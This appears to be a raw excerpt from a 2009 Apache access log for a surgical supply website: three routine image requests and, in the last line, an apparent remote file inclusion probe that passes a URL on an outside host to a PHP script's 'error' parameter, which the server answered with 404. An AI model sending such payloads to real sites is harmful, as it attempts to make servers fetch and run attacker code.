222.255.200.107 - - [08/Jun/2009:00:44:22 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.255.200.107 - - [08/Jun/2009:00:44:24 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.255.200.107 - - [08/Jun/2009:00:44:26 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
218.246.20.221 - - [08/Jun/2009:00:44:28 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
